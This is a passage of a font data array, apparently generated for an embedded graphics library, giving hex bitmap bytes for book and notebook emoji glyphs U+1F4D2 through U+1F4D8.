0x0, 0x0, 0x3, 0x80, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+1F4D2 "📒" */
0x0, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x3, 0xf8, 0x7, 0x80, 0x0,
0x0, 0x0, 0x1, 0xfe, 0x7, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0x7, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0x7, 0x0, 0x0, 0x0, 0x0, 0x1,
0x9f, 0x7, 0x38, 0x0, 0x0, 0x0, 0x1, 0x87,
0xf, 0xfc, 0x0, 0x0, 0x0, 0x1, 0x87, 0x3f,
0xfc, 0x0, 0x0, 0x0, 0x1, 0x87, 0x77, 0x38,
0x0, 0x0, 0x0, 0x1, 0x87, 0xe7, 0x0, 0x0,
0x0, 0x0, 0x1, 0x87, 0xc7, 0x0, 0x0, 0x0,
0x0, 0x1, 0x87, 0xc7, 0x0, 0x0, 0x0, 0x0,
0x1, 0x87, 0xc7, 0x0, 0x0, 0x0, 0x0, 0x1,
0x87, 0xe7, 0x0, 0x0, 0x0, 0x0, 0x1, 0x87,
0x7f, 0x38, 0x0, 0x0, 0x0, 0x1, 0x87, 0x3f,
0xfc, 0x0, 0x0, 0x0, 0x1, 0x87, 0x3f, 0xfc,
0x0, 0x0, 0x0, 0x1, 0x87, 0x77, 0x38, 0x0,
0x0, 0x0, 0x1, 0x87, 0x67, 0x0, 0x0, 0x0,
0x0, 0x1, 0x87, 0xc7, 0x0, 0x0, 0x0, 0x0,
0x1, 0x87, 0xc7, 0x0, 0x0, 0x0, 0x0, 0x1,
0x87, 0xc7, 0x0, 0x0, 0x0, 0x0, 0x1, 0x87,
0xc7, 0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0x67,
0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0x7f, 0x38,
0x0, 0x0, 0x0, 0x1, 0x87, 0x3f, 0xfc, 0x0,
0x0, 0x0, 0x1, 0x87, 0x3f, 0xfc, 0x0, 0x0,
0x0, 0x1, 0x87, 0x77, 0x38, 0x0, 0x0, 0x0,
0x1, 0x87, 0xe7, 0x0, 0x0, 0x0, 0x0, 0x1,
0x87, 0xc7, 0x0, 0x0, 0x0, 0x0, 0x1, 0x87,
0xc7, 0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xc7,
0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xe7, 0x0,
0x0, 0x0, 0x0, 0x1, 0x87, 0x7f, 0x38, 0x0,
0x0, 0x0, 0x1, 0x87, 0x3f, 0xfc, 0x0, 0x0,
0x0, 0x1, 0x87, 0x3f, 0xfc, 0x0, 0x0, 0x0,
0x1, 0x87, 0x77, 0x38, 0x0, 0x0, 0x0, 0x1,
0x87, 0xe7, 0x0, 0x0, 0x0, 0x0, 0x1, 0x87,
0xc7, 0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xc7,
0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xc7, 0x0,
0x0, 0x0, 0x0, 0x1, 0x87, 0xe7, 0x0, 0x0,
0x0, 0x0, 0x1, 0x87, 0x7f, 0x38, 0x0, 0x0,
0x0, 0x1, 0x87, 0x3f, 0xfc, 0x0, 0x0, 0x0,
0x1, 0x87, 0x3f, 0xfc, 0x0, 0x0, 0x0, 0x1,
0x87, 0x77, 0x38, 0x0, 0x0, 0x0, 0x1, 0x87,
0x67, 0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xc7,
0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xc7, 0x0,
0x0, 0x0, 0x0, 0x1, 0x87, 0xc7, 0x0, 0x0,
0x0, 0x0, 0x1, 0x87, 0xc7, 0x0, 0x0, 0x0,
0x0, 0x1, 0x87, 0xe7, 0x80, 0x0, 0x0, 0x0,
0x3, 0x87, 0x73, 0xc0, 0x0, 0x0, 0x0, 0x7,
0x87, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc7,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xfd, 0xc7, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x0, 0xe7, 0x0, 0xc0,
0x0, 0x0, 0x0, 0x0, 0xf7, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x1e, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+1F4D3 "📓" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x3f, 0xf9, 0x0, 0x30,
0x40, 0x83, 0xf8, 0xff, 0xdc, 0x80, 0x11, 0x0,
0x17, 0xfb, 0xff, 0x22, 0x44, 0x24, 0x1f, 0x1f,
0xff, 0xfe, 0xc1, 0x61, 0x90, 0xc, 0x77, 0xff,
0xe1, 0x1, 0x0, 0x6e, 0x31, 0xcf, 0xff, 0x80,
0x87, 0x0, 0x18, 0xcf, 0x1f, 0xfe, 0x82, 0x3c,
0xc0, 0x47, 0x3c, 0x7f, 0xfe, 0xf2, 0xc6, 0x61,
0x10, 0x71, 0xff, 0xe3, 0x13, 0x90, 0xcb, 0x81,
0xc7, 0xff, 0x80, 0x7f, 0xff, 0xf4, 0x1f, 0x1f,
0xfe, 0x43, 0xff, 0xff, 0xfc, 0xfc, 0x7f, 0xf9,
0x8f, 0xff, 0xff, 0x93, 0x71, 0xff, 0xf6, 0x30,
0x0, 0x7, 0xd, 0xc7, 0xff, 0x8b, 0xc0, 0x0,
0x1c, 0x37, 0x1f, 0xfe, 0x43, 0x0, 0x0, 0x7c,
0xfc, 0x7f, 0xf9, 0x8c, 0x0, 0x1, 0xe0, 0xf1,
0xff, 0xe6, 0x30, 0x0, 0x7, 0x1, 0xc7, 0xff,
0x93, 0xc0, 0x0, 0x1c, 0xcf, 0x1f, 0xff, 0x7,
0x0, 0x0, 0x77, 0x3c, 0x7f, 0xf8, 0xcc, 0x0,
0x1, 0xd0, 0xf1, 0xff, 0xe3, 0x30, 0x0, 0x6,
0xcf, 0xc7, 0xff, 0x81, 0x7f, 0xff, 0xf8, 0x87,
0x1f, 0xfe, 0xcc, 0xff, 0xff, 0xd6, 0x1c, 0x7f,
0xfe, 0x71, 0x2, 0x6, 0x60, 0x71, 0xff, 0xf8,
0x82, 0x0, 0x99, 0x8d, 0xc7, 0xff, 0xc0, 0xc,
0x72, 0x7, 0x1f, 0x1f, 0xfe, 0x3, 0x11, 0xc0,
0x8e, 0x7c, 0x7f, 0xf8, 0x7e, 0x7, 0xe, 0x33,
0xf1, 0xff, 0xe0, 0x1a, 0x10, 0x70, 0x1, 0xc7,
0xff, 0xb0, 0x4, 0x0, 0x71, 0x47, 0x1f, 0xfe,
0xe2, 0x90, 0x60, 0x7, 0x3c, 0x7f, 0xf8, 0x1e,
0x71, 0x0, 0xc, 0xf1, 0xff, 0xe0, 0x9, 0x17,
0xa7, 0x39, 0xc7, 0xff, 0xc4, 0x1, 0xcd, 0x80,
0x87, 0x1f, 0xff, 0x90, 0x1, 0x26, 0x2, 0x5c,
0x7f, 0xfc, 0x4c, 0x44, 0x9, 0x9, 0xf1, 0xff,
0xe7, 0x91, 0x90, 0xe4, 0x1f, 0xc7, 0xff, 0x90,
0xc0, 0x12, 0xcc, 0x77, 0x1f, 0xfe, 0xc0, 0x65,
0xc0, 0x18, 0x5c, 0x7f, 0xf8, 0xe0, 0x8f, 0x96,
0x0, 0x71, 0xff, 0xe1, 0x28, 0x0, 0xc0, 0x3,
0xc7, 0xff, 0x81, 0xe1, 0x83, 0x7, 0xcf, 0x1f,
0xff, 0x20, 0xf3, 0x84, 0x83, 0x1c, 0x7f, 0xfc,
0x86, 0xc0, 0xc3, 0xc, 0x71, 0xff, 0xf3, 0x83,
0x3, 0xc, 0xe1, 0xc7, 0xff, 0xa0, 0xc, 0xe0,
0x10, 0x7, 0x1f, 0xfe, 0x87, 0x80, 0x80, 0x0,
0x1c, 0x7f, 0xfa, 0xe, 0x3, 0x20, 0x0, 0xf1,
0xff, 0xe5, 0x81, 0xbb, 0xc4, 0xe1, 0xc7, 0xff,
0x86, 0x12, 0x27, 0x92, 0xc7, 0x1f, 0xfe, 0x11,
0x60, 0x0, 0x3, 0x1c, 0x7f, 0xfe, 0x4, 0xc6,
0x1, 0xc0, 0xf1, 0xff, 0xe0, 0x0, 0x1c, 0xe7,
0x87, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x9f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3d, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
/* U+1F4D4 "📔" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x3f, 0xc0, 0x0, 0x0,
0x0, 0x3, 0xf8, 0xff, 0x0, 0x0, 0x0, 0x0,
0x7, 0xfb, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x6f, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x1, 0x8f, 0xff, 0x0,
0x0, 0x0, 0x0, 0x6, 0x1f, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x18, 0x7f, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x61, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x1,
0x87, 0xff, 0x0, 0x0, 0x78, 0x0, 0x6, 0x1f,
0xfc, 0x0, 0x7, 0xf8, 0x0, 0x18, 0x7f, 0xf0,
0x0, 0x7f, 0xf8, 0x0, 0x61, 0xff, 0xc0, 0x7f,
0xe1, 0xff, 0x81, 0x87, 0xff, 0x1, 0xff, 0x3,
0xfe, 0x6, 0x1f, 0xfc, 0x7, 0xf0, 0x3, 0xf8,
0x18, 0x7f, 0xf0, 0x1c, 0x0, 0x0, 0xe0, 0x61,
0xff, 0xc0, 0x70, 0x0, 0x3, 0x81, 0x87, 0xff,
0x1, 0xc0, 0x0, 0xe, 0x6, 0x1f, 0xfc, 0x7,
0x0, 0x0, 0x38, 0x18, 0x7f, 0xf0, 0x1c, 0x0,
0x0, 0xe0, 0x61, 0xff, 0xc0, 0x7e, 0x0, 0x1f,
0x81, 0x87, 0xff, 0x1, 0xfe, 0x1, 0xfe, 0x6,
0x1f, 0xfc, 0x7, 0xfe, 0x1f, 0xf8, 0x18, 0x7f,
0xf0, 0x0, 0x7f, 0xf8, 0x0, 0x61, 0xff, 0xc0,
0x0, 0x7f, 0x80, 0x1, 0x87, 0xff, 0x0, 0x0,
0x78, 0x0, 0x6, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x18, 0x7f, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x61, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x1, 0x87,
0xff, 0x0, 0x0, 0x0, 0x0, 0x6, 0x1f, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x18, 0x7f, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x61, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x1, 0x87, 0xff, 0x0, 0x0, 0x0, 0x0,
0x6, 0x1f, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x18,
0x7f, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x61, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xff, 0x0,
0x0, 0x0, 0x0, 0x6, 0x1f, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x18, 0x7f, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x61, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x1,
0x87, 0xff, 0x0, 0x0, 0x0, 0x0, 0x6, 0x1f,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x18, 0x7f, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x61, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x1, 0x87, 0xff, 0x0, 0x0, 0x0,
0x0, 0x6, 0x1f, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x18, 0x7f, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x61,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xff,
0x0, 0x0, 0x0, 0x0, 0x6, 0x1f, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x18, 0x7f, 0xf0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x7, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xdc, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x39, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x3, 0xf7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
/* U+1F4D5 "📕" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x3f, 0xc0, 0x70, 0xe,
0x3, 0x83, 0xf8, 0xff, 0x1, 0xc0, 0x38, 0xe,
0x7, 0xfb, 0xfc, 0x7, 0x0, 0xe0, 0x38, 0x1f,
0xff, 0xf0, 0x1c, 0x3, 0x80, 0xe0, 0x6f, 0xff,
0xc0, 0x70, 0xe, 0x3, 0x81, 0x8f, 0xff, 0x1,
0xc0, 0x38, 0xe, 0x6, 0x1f, 0xfc, 0x7, 0x0,
0xe0, 0x38, 0x18, 0x7f, 0xf0, 0x1c, 0x3, 0x80,
0xe0, 0x61, 0xff, 0xc0, 0x70, 0xe, 0x3, 0x81,
0x87, 0xff, 0x1, 0xc0, 0x38, 0xe, 0x6, 0x1f,
0xfc, 0x7, 0x0, 0xe0, 0x38, 0x18, 0x7f, 0xf0,
0x1c, 0x3, 0x80, 0xe0, 0x61, 0xff, 0xc0, 0x70,
0xe, 0x3, 0x81, 0x87, 0xff, 0x1, 0xc0, 0x38,
0xe, 0x6, 0x1f, 0xfc, 0x7, 0x0, 0xe0, 0x38,
0x18, 0x7f, 0xf0, 0x1c, 0x3, 0x80, 0xe0, 0x61,
0xff, 0xc0, 0x70, 0xe, 0x3, 0x81, 0x87, 0xff,
0x1, 0xc0, 0x38, 0xe, 0x6, 0x1f, 0xfc, 0x7,
0x0, 0xe0, 0x38, 0x18, 0x7f, 0xf0, 0x1c, 0x3,
0x80, 0xe0, 0x61, 0xff, 0xc0, 0x70, 0xe, 0x3,
0x81, 0x87, 0xff, 0x1, 0xc0, 0x38, 0xe, 0x6,
0x1f, 0xfc, 0x7, 0x0, 0xe0, 0x38, 0x18, 0x7f,
0xf0, 0x1c, 0x3, 0x80, 0xe0, 0x61, 0xff, 0xc0,
0x70, 0xe, 0x3, 0x81, 0x87, 0xff, 0x1, 0xc0,
0x38, 0xe, 0x6, 0x1f, 0xfc, 0x7, 0x0, 0xe0,
0x38, 0x18, 0x7f, 0xf0, 0x1c, 0x3, 0x80, 0xe0,
0x61, 0xff, 0xc0, 0x70, 0xe, 0x3, 0x81, 0x87,
0xff, 0x1, 0xc0, 0x38, 0xe, 0x6, 0x1f, 0xfc,
0x7, 0x0, 0xe0, 0x38, 0x18, 0x7f, 0xf0, 0x1c,
0x3, 0x80, 0xe0, 0x61, 0xff, 0xc0, 0x70, 0xe,
0x3, 0x81, 0x87, 0xff, 0x1, 0xc0, 0x38, 0xe,
0x6, 0x1f, 0xfc, 0x7, 0x0, 0xe0, 0x38, 0x18,
0x7f, 0xf0, 0x1c, 0x3, 0x80, 0xe0, 0x61, 0xff,
0xc0, 0x70, 0xe, 0x3, 0x81, 0x87, 0xff, 0x1,
0xc0, 0x38, 0xe, 0x6, 0x1f, 0xfc, 0x7, 0x0,
0xe0, 0x38, 0x18, 0x7f, 0xf0, 0x1c, 0x3, 0x80,
0xe0, 0x61, 0xff, 0xc0, 0x70, 0xe, 0x3, 0x81,
0x87, 0xff, 0x1, 0xc0, 0x38, 0xe, 0x6, 0x1f,
0xfc, 0x7, 0x0, 0xe0, 0x38, 0x18, 0x7f, 0xf0,
0x1c, 0x3, 0x80, 0xe0, 0x61, 0xff, 0xc0, 0x70,
0xe, 0x3, 0x81, 0x87, 0xff, 0x1, 0xc0, 0x38,
0xe, 0x6, 0x1f, 0xfc, 0x7, 0x0, 0xe0, 0x38,
0x18, 0x7f, 0xf0, 0x1c, 0x3, 0x80, 0xe0, 0x61,
0xff, 0xc0, 0x70, 0xe, 0x3, 0x81, 0x87, 0xff,
0x1, 0xc0, 0x38, 0xe, 0x6, 0x1f, 0xfc, 0x7,
0x0, 0xe0, 0x38, 0x18, 0x7f, 0xf0, 0x1c, 0x3,
0x80, 0xe0, 0xe1, 0xff, 0xc0, 0x70, 0xe, 0x3,
0x87, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xdc, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x39, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x3, 0xf7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
/* U+1F4D6 "📖" */
0x0, 0x0, 0x0, 0xff, 0xc0, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0xfc, 0xff, 0xff,
0xe0, 0x0, 0x0, 0x0, 0xff, 0xf8, 0x7, 0xf8,
0x7, 0xff, 0xe0, 0x0, 0x7, 0xff, 0x80, 0x0,
0x78, 0x0, 0x7, 0xff, 0xc0, 0x3, 0xfc, 0x0,
0x0, 0xc, 0x0, 0x0, 0xf, 0xf8, 0x1, 0xf0,
0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0x1e, 0xf,
0xf8, 0x0, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x3,
0xff, 0xfe, 0x0, 0x1, 0xfc, 0x30, 0xfe, 0x0,
0x0, 0xff, 0xdd, 0x80, 0xfe, 0x7f, 0xc, 0x3f,
0x9f, 0xc0, 0x36, 0xf7, 0x63, 0xff, 0x80, 0x3,
0x0, 0x7, 0xff, 0xd, 0xbd, 0xd8, 0xf8, 0x0,
0x0, 0xc0, 0x0, 0x7, 0xc3, 0x6f, 0x76, 0x0,
0x0, 0x0, 0x30, 0x0, 0x0, 0x0, 0xdb, 0xdd,
0x80, 0x0, 0x0, 0xc, 0x0, 0x0, 0x0, 0x36,
0xf7, 0x60, 0x0, 0x63, 0xc3, 0xf, 0x18, 0x0,
0xd, 0xbd, 0xd8, 0x9, 0xf8, 0xf0, 0xc3, 0xc7,
0xe4, 0x3, 0x6f, 0x76, 0x3e, 0x7c, 0x0, 0x30,
0x0, 0xf9, 0xf0, 0xdb, 0xdd, 0x8f, 0x80, 0x0,
0xc, 0x0, 0x0, 0x7c, 0x36, 0xf7, 0x63, 0x0,
0x0, 0x3, 0x0, 0x0, 0x3, 0xd, 0xbd, 0xd8,
0x0, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x3, 0x6f,
0x76, 0x0, 0x0, 0x0, 0x30, 0x0, 0x0, 0x0,
0xdb, 0xdd, 0x80, 0x0, 0xf3, 0xc, 0x33, 0xc0,
0x0, 0x36, 0xf7, 0x60, 0x7f, 0x3c, 0xc3, 0xc,
0xf3, 0xf8, 0xd, 0xbd, 0xd8, 0xff, 0xc0, 0x0,
0xc0, 0x0, 0xff, 0xc3, 0x6f, 0x76, 0x3e, 0x0,
0x0, 0x30, 0x0, 0x1, 0xf0, 0xdb, 0xdd, 0x80,
0x0, 0x0, 0xc, 0x0, 0x0, 0x0, 0x36, 0xf7,
0x60, 0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0xd,
0xbd, 0xd8, 0x0, 0x7, 0xf0, 0xc3, 0xf8, 0x0,
0x3, 0x6f, 0x76, 0x3, 0x39, 0xfc, 0x30, 0xfe,
0x73, 0x0, 0xdb, 0xdd, 0x8f, 0xce, 0x0, 0xc,
0x0, 0x1c, 0xfc, 0x36, 0xf7, 0x63, 0xe0, 0x0,
0x3, 0x0, 0x0, 0x3f, 0xd, 0xbd, 0xd8, 0x0,
0x0, 0x0, 0xc0, 0x0, 0x0, 0x3, 0x6f, 0x76,
0x0, 0x0, 0x0, 0x30, 0x0, 0x0, 0x0, 0xdb,
0xdd, 0x80, 0x1, 0x8f, 0xc, 0x3c, 0x60, 0x0,
0x36, 0xf7, 0x60, 0xf, 0xe3, 0xc3, 0xf, 0x1f,
0xc0, 0xd, 0xbd, 0xd8, 0xf3, 0xf0, 0x0, 0xc0,
0x3, 0xf3, 0xc3, 0x6f, 0x76, 0x3c, 0x0, 0x0,
0x30, 0x0, 0x0, 0xf0, 0xdb, 0xdd, 0x88, 0x0,
0x0, 0xc, 0x0, 0x0, 0x4, 0x36, 0xf7, 0x60,
0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0xd, 0xbd,
0xd8, 0x0, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x3,
0x6f, 0x76, 0x0, 0x0, 0x0, 0x30, 0x0, 0x0,
0x0, 0xdb, 0xdd, 0x80, 0x0, 0xff, 0xc, 0x3f,
0xe0, 0x0, 0x36, 0xf7, 0x60, 0x7, 0xff, 0xfb,
0x7f, 0xff, 0xc0, 0xd, 0xbd, 0xd8, 0x3f, 0xf0,
0xf, 0xfe, 0x3, 0xff, 0x3, 0x6f, 0x77, 0xff,
0xc0, 0x0, 0xfc, 0x0, 0x7, 0xff, 0xdb, 0xdd,
0xfe, 0x0, 0x0, 0xe, 0x0, 0x0, 0xf, 0xf6,
0xf7, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0,
0x1, 0xbd, 0xc0, 0x0, 0x1, 0xf8, 0x7, 0xf0,
0x0, 0x0, 0x6f, 0x70, 0x0, 0xf, 0xff, 0x83,
0xff, 0xe0, 0x0, 0x1b, 0xdc, 0x3, 0xff, 0xe0,
0x71, 0xc1, 0xff, 0xf8, 0x6, 0xf7, 0xff, 0xff,
0x80, 0xc, 0xc0, 0x7, 0xff, 0xff, 0xbd, 0xff,
0xfc, 0x0, 0x3, 0xb0, 0x0, 0xf, 0xff, 0xef,
0x0, 0x0, 0x7, 0xfe, 0x7d, 0xff, 0x80, 0x0,
0x3, 0xc0, 0x1f, 0xff, 0xff, 0xde, 0xff, 0xff,
0xfe, 0x0, 0xff, 0xff, 0xff, 0xf8, 0x38, 0x70,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x7,
0xf8, 0x0, 0x3, 0xff, 0xff, 0xc0, 0x0, 0x0,
0x0, 0xfc, 0x0, 0x0, 0x0, 0xf,
/* U+1F4D7 "📗" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x3f, 0xe0, 0x78, 0x0,
0xe0, 0x3, 0xf8, 0xff, 0x80, 0xf0, 0x1, 0xc0,
0x7, 0xfb, 0xfe, 0x1, 0xe0, 0x3, 0x80, 0x1f,
0xff, 0xf8, 0x3, 0xc0, 0x7, 0x0, 0x6f, 0xff,
0xe0, 0x7, 0x80, 0x1e, 0x1, 0x87, 0xff, 0x80,
0xf, 0x0, 0x3c, 0x6, 0x1f, 0xfe, 0x0, 0x1e,
0x0, 0x78, 0x18, 0x7f, 0xfc, 0x0, 0x38, 0x0,
0xf0, 0x61, 0xff, 0xf8, 0x0, 0x70, 0x1, 0xe1,
0x87, 0xff, 0xf0, 0x0, 0xe0, 0x3, 0xc6, 0x1f,
0xfe, 0xe0, 0x1, 0xc0, 0x7, 0x18, 0x7f, 0xf9,
0xc0, 0x3, 0x80, 0xe, 0x61, 0xff, 0xe3, 0x80,
0x7, 0x0, 0x1d, 0x87, 0xff, 0x87, 0x0, 0xe,
0x0, 0x3e, 0x1f, 0xfe, 0xe, 0x0, 0x1c, 0x0,
0x78, 0x7f, 0xf8, 0x1c, 0x0, 0x38, 0x0, 0xe1,
0xff, 0xe0, 0x38, 0x0, 0x70, 0x1, 0x87, 0xff,
0x80, 0x70, 0x0, 0xe0, 0x6, 0x1f, 0xfe, 0x0,
0xe0, 0x1, 0xc0, 0x18, 0x7f, 0xf8, 0x1, 0xc0,
0x7, 0x80, 0x61, 0xff, 0xe0, 0x3, 0x80, 0xf,
0x1, 0x87, 0xff, 0xc0, 0x7, 0x0, 0x1e, 0x6,
0x1f, 0xff, 0x80, 0xe, 0x0, 0x3c, 0x18, 0x7f,
0xff, 0x0, 0x1c, 0x0, 0x78, 0x61, 0xff, 0xfe,
0x0, 0x38, 0x0, 0xf1, 0x87, 0xff, 0xbc, 0x0,
0x70, 0x1, 0xe6, 0x1f, 0xfe, 0x78, 0x0, 0xe0,
0x3, 0xd8, 0x7f, 0xf8, 0xf0, 0x1, 0xc0, 0x7,
0xe1, 0xff, 0xe1, 0xe0, 0x3, 0x80, 0xf, 0x87,
0xff, 0x83, 0xc0, 0x7, 0x0, 0x1e, 0x1f, 0xfe,
0x7, 0x80, 0xe, 0x0, 0x38, 0x7f, 0xf8, 0xf,
0x0, 0x1c, 0x0, 0x61, 0xff, 0xe0, 0x1e, 0x0,
0x78, 0x1, 0x87, 0xff, 0x80, 0x3c, 0x0, 0xf0,
0x6, 0x1f, 0xfe, 0x0, 0x78, 0x1, 0xe0, 0x18,
0x7f, 0xf8, 0x0, 0xf0, 0x3, 0xc0, 0x61, 0xff,
0xf0, 0x1, 0xe0, 0x7, 0x81, 0x87, 0xff, 0xe0,
0x3, 0xc0, 0xf, 0x6, 0x1f, 0xff, 0xc0, 0x7,
0x80, 0x1e, 0x18, 0x7f, 0xfb, 0x80, 0xf, 0x0,
0x3c, 0x61, 0xff, 0xe7, 0x0, 0x1e, 0x0, 0x79,
0x87, 0xff, 0x8e, 0x0, 0x3c, 0x0, 0xf6, 0x1f,
0xfe, 0x1c, 0x0, 0x78, 0x1, 0xf8, 0x7f, 0xf8,
0x38, 0x0, 0xf0, 0x3, 0xe1, 0xff, 0xe0, 0x70,
0x1, 0xe0, 0x7, 0x87, 0xff, 0x80, 0xe0, 0x3,
0xc0, 0xe, 0x1f, 0xfe, 0x1, 0xc0, 0x7, 0x80,
0x18, 0x7f, 0xf8, 0x3, 0x80, 0xf, 0x0, 0x61,
0xff, 0xe0, 0x7, 0x0, 0x1e, 0x1, 0x87, 0xff,
0x80, 0xe, 0x0, 0x3c, 0x6, 0x1f, 0xfe, 0x0,
0x1c, 0x0, 0x78, 0x18, 0x7f, 0xf8, 0x0, 0x38,
0x0, 0xf0, 0xe1, 0xff, 0xe0, 0x0, 0x70, 0x1,
0xe7, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xdc, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x39, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x3, 0xf7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
/* U+1F4D8 "📘" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x3f, 0xe0, 0x0, 0x0,
0x0, 0x3, 0xf8, 0xff, 0x80, 0x0, 0x0, 0x0,
0x7, 0xfb, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x6f, 0xff,
